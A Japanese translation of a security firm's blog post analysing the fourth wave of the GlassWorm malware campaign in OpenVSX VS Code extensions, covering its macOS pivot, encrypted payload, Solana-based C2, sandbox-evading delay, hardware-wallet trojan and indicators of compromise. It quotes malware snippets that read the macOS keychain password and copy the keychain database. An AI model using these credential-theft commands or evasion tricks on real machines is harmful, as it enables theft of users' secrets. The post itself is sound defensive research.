2.5ヶ月前、私たちはVS Code拡張機能を狙った最初の自己伝播型ワームであるGlassWormを公開しました。これは目に見えないUnicode文字を使用して悪意のあるコードを隠しています。私たちはこの脅威アクターを3つの波で追跡してきました:目に見えないUnicodeペイロード、再度の攻撃は中東の政府機関を含む実際の被害者を暴露し、コンパイルされたRustバイナリへのピボットを行いました。
そして彼らが戻ってきました。50,000ダウンロード、WindowsからmacOSへのプラットフォーム切り替え、そしてあなたがこれを読んでいる時点でインフラストラクチャは完全に動作しています。
当社のリスクエンジンはOpenVSXマーケットプレイスの3つの疑わしい拡張機能にフラグを立てました。最初は、当社が追跡してきたキャンペーンに接続されていないように見えました。しかし、Solanaブロックチェーンのc2を見つけたとき、インフラストラクチャを追跡するまで、見覚えのあるIPが確認されました:45.32.151.157。GlassWormの3番目の波から同じC2サーバです。
10月に公開した目に見えないUnicode技術?消えました。Wave 3のRustバイナリ?これも消えました。今回は、ペイロードはAES-256-CBC暗号化でラップされ、コンパイルされたJavaScriptに埋め込まれていますが、コアメカニズムは変わりません。Solanaから現在のC2エンドポイントをフェッチし、それが返すものを実行します。新しい点はターゲットです。ハードウェアウォレットアプリケーションをトロイの木馬化されたバージョンに置き換えるように設計されたコード。
GlassWormの攻撃者は単に執拗なだけではなく、進化しています。そして今、彼らはあなたのMacを狙いに来ています。
ピボット:WindowsからmacOSへ
これはWave 4で最大の変更です。以前のすべてのGlassWormの波はWindowsを独占的にターゲットにしていました。Wave 4はmacOSを独占的にターゲットにしています。
なぜシフトするのか?
開発者はMacを使用します。特に暗号、web3、スタートアップ環境では、GlassWormが危険にさらしたい被害者と正にそこです。攻撃者は魚がいるところで釣りをしています。
これは怠け者のポートではありません。macOSペイロードは特別に構築されており、全体を通してプラットフォーム固有の技術を使用しています:
PowerShellの代わりにステルス実行用のAppleScript:
set keychainPassword to do shell script "security 2>&1 \\
find-generic-password -s 'pass_users_for_script' -w"レジストリキーとスケジュールされたタスクの代わりに永続性用のLaunchAgents:
キーチェーンデータベースの直接盗難:
readwrite(profile & "/Library/Keychains/login.keychain-db", \\
writemind & "keychain")攻撃者はmacOSを知っています。これはプロの仕事です。
新しい配信方法:暗号化されたJavaScript
Wave 1は目に見えないUnicode文字を使用しました。文字通り空白に隠されたレンダリング不可能なコード。
Wave 3はコンパイルされたRustバイナリを使用しました。分析するためにリバースエンジニアリングが必要なネイティブコード。
Wave 4は異なるものを使用しています:コンパイルされたJavaScriptに直接埋め込まれたAES-256-CBC暗号化ペイロード。
pro-svelte-extensionのメインファイルの64行目で見つけたのは次のとおりです:
ペイロードはハードコードされたキーとIVで暗号化されています。3つすべての拡張機能で同じキー。単一のアクターを確認しています。でもここが賢い部分です:
15分間の遅延。
コード内の9e5?それは900,000ミリ秒です。15分。
ほとんどの自動サンドボックス環境は5分後にタイムアウトします。何か悪意のあることを実行する前に15分待つことで、マルウェアは動的分析を完全に回避します。サンドボックスはクリーンな拡張機能を見ます。承認されます。開発者がそれをインストールしてから15分後、実際のペイロードがドロップされます。
これが従来のセキュリティスキャンが見落とした理由です。
新しいC2インフラストラクチャ(ほとんど)
攻撃者はこの波に新しいSolanaウォレットを使用しています:BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC。以前の波のウォレットとは異なりますが、古いものはまだアクティブです。
ブロックチェーンを通じてインフラストラクチャの進化を追跡できます。11月27日、トランザクションは217.69.11.60を指していました。12月までに、C2は45.32.151.157にシフトしました。Wave 3にも表示されたIPです。それが同じアクターであることをどうやって知ったかです。
彼らはまた新しい流出サーバを追加しました:45.32.150.251。
Solanaブロックチェーンc2技術は変わりません。攻撃者はBase64エンコードされたURLを含むトランザクションメモを投稿し、マルウェアはブロックチェーンをクエリして現在のC2エンドポイントを見つけます。不変、分散化、削除不可能。
新しい機能:ハードウェアウォレットトロイの木馬
ここがWave 4が本当に危険な場所です。
以前のGlassWormの波は認証情報を盗み、バックドアをインストールしました。Wave 4はすべてをします。さらに、ハードウェアウォレットアプリケーションをトロイの木馬化されたバージョンに置き換えようとします。
重要なタイミングに関する注記:2025年12月29日の当社のテストの時点で、トロイの木馬化されたウォレットのC2サーバエンドポイントは空のファイルを返しています。マルウェアには1000バイト未満のファイルのインストールを防ぐファイルサイズ検証が含まれています。これはダウンロードが不完全な場合、ウォレット置換がサイレントに失敗する防御的プログラミング選択です。
これは攻撃者がまだmacOSウォレットトロイの木馬を準備しているか、インフラストラクチャが移行中であることを意味するかもしれません。機能は構築され、準備ができています。ペイロードがアップロードされるのを待っているだけです。他のすべての悪意のある機能(認証情報盗難、キーチェーンアクセス、データ流出、永続性)は完全に動作しています。
コードはLedger LiveとTrezor Suiteの両方をチェックします:
いずれかが見つかった場合、マルウェアはトロイの木馬化された置換をダウンロードし、正当なアプリを削除し、その場所に悪意のあるバージョンをインストールします。
これは機能における重大なエスカレーションです。ハードウェアウォレットは暗号通貨を保存する最も安全な方法であると想定されています。ユーザーが信頼する理由は、署名が別のデバイスで行われるためです。しかし、Ledger LiveまたはTrezor Suiteアプリケーションが侵害された場合、攻撃者は以下のことができます:
- 偽の受信アドレスを表示する
- 署名前にトランザクション詳細を変更する
- 「回復」フロー中にシードフレーズをキャプチャする
- アプリとデバイス間の通信を傍受する
ハードウェアウォレットは、それと対話するために使用するソフトウェアと同じくらい安全です。
ファイルサイズ検証コードは攻撃者の詳細への注意を明らかにします:
これはアマチュアタイムではありません。攻撃者は被害者に警告する可能性のある壊れたインストールを防ぐために、健全性チェックを組み込みました。トロイの木馬化されたウォレットペイロードがライブになったとき、インストールはシームレスになります。
何がまだ盗まれるか
ハードウェアウォレットトロイの木馬がアクティブでなくても、ペイロードは壊滅的です。
暗号通貨ウォレット – マルウェアはMetaMask、Phantom、Coinbase Wallet、Exodus、Keplr、Solflare、Trust Wallet、Rabbyを含む50以上のブラウザ拡張機能ウォレットをターゲットにしています。また、デスクトップウォレットも狙っています:Electrum、Coinomi、Exodus、Atomic、Ledger Liveデータ、Trezor Suiteデータ、Monero、Bitcoin Core。
開発者認証情報 – VS Codeストレージとgit認証情報キャッシュからのGitHubトークン。.npmrcからのNPMトークン。あなたの完全な~/.sshディレクトリ。キャッシュされた認証からのgit認証情報。
システム認証情報 – macOS Keychainパスワードと生データベースファイル。VPN構成。Chrome、Firefox、Brave、Edgeからのブラウザcookieとローカルストレージ。
すべて/tmp/ijewf/でステージングされ、圧縮されて45.32.150.251/p2pに流出されます。
進化パターン
一歩引いて、私たちが見ているものを見てみましょう。
Wave 1(10月17日):OpenVSX拡張機能の目に見えないUnicode。Windows中心。C2のSolana + Google Calendar。
Wave 2(11月6日):同じ技術、より多くの拡張機能。攻撃者のサーバにアクセスし、中東の政府機関を含む実在する被害者を見つけました。
Wave 3(11月22日):Unicodeの代わりにRustバイナリ。目に見えないコードはなくなりました。リバースエンジニアリングが必要なコンパイルされたネイティブコードです。
Wave 4(12月19日):macOSへのプラットフォームピボット。暗号化されたJavaScriptペイロード。新しいSolanaウォレット。ハードウェアウォレットトロイの木馬化機能が追加されました。
パターンは明らかです。私たちが彼らの技術を公開するたびに、彼らは適応します:
- Unicode技術が記録された → Rustバイナリに切り替え
- Rustバイナリが分析された → 暗号化されたJavaScriptに移動
- Windowsターゲティングが既知 → macOSにピボット
- 認証情報盗難が確立 → ハードウェアウォレットトロイの木馬を追加
これはセキュリティ研究を読み、その対応でツールを進化させるアクティブな適応型脅威アクターです。共有インフラストラクチャ(45.32.151.157)はそれが同じアクターであることを証明しています。継続的な進化は、彼らが去らないことを証明しています。
IOC
拡張機能ID(open-vsx):
studio-velte-distributor.pro-svelte-extensioncudra-production.vsce-prettier-proPuccin-development.full-access-catppuccin-pro-extension
ネットワークインジケータ:
45.32.151.157– プライマリC2(Wave 3と共有)45.32.150.251– 流出サーバ217.69.11.60– 前のC2(2025年11月27日)BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC– Solana c2ウォレット
最終的な考え
GlassWormは現在クロスプラットフォーム脅威です。
これらの拡張機能は数日間ライブでした。そのウィンドウでは、VS Code Marketplaceの自動スキャンが何も悪いことを見ない間に、50,000ダウンロードを蓄積しました。
これはスキャンの失敗ではなく、アプローチの制限です。マルウェアが15分待って実行されるとき、静的分析は常にクリーンになります。c2インフラストラクチャが不変のブロックチェーンに存在する場合、ブラックリストする領域はありません。攻撃者があなたの研究を読み、数週間以内に新しい技術を出荷する場合、署名ベースの検出は常に1ステップ遅れています。
2.5ヶ月の4つの波。それぞれが前のものより能力が高い。Wave 5があるかどうかの問題ではなく、開発者がインストールする前にそれをキャッチするかどうかです。
このまとめはKoi Securityの研究チームによって作成されました。
当社のリスクエンジンWingsは、公開後数時間以内にこれらの拡張機能にフラグを立てました。攻撃者がこの速度で進化するとき、ソフトウェアサプライチェーン全体にわたって継続的な行動分析が必要です。
デモを予約すると、Koiがスキャナーが見落とすものをどのようにキャッチするかを確認できます。
そこで安全に過ごしましょう
翻訳元: https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks
